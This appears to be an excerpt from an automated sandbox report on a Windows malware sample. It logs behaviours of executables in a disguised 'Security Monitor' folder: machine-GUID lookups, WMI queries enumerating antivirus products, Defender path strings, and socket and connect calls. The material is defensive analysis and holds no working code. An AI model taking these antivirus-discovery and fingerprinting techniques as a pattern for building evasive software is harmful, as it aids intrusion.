Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0337D280 GetLocalTime, 56_2_0337D280
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0337611A GetVersion, 56_2_0337611A
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: spkl.exe, 00000038.00000002.2755859416.0000000007720000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: spkl.exe, 00000038.00000002.2755859416.0000000007720000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: der\MsMpeng.exe
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntivirusProduct
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_003752B0 setsockopt,_errno,_errno,_errno,strlen,memset,strncmp,strncmp,htons,WSAGetLastError,setsockopt,WSAIoctl,WSAGetLastError,strchr,htons,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,WSAGetLastError,connect,htons,atoi, 71_2_003752B0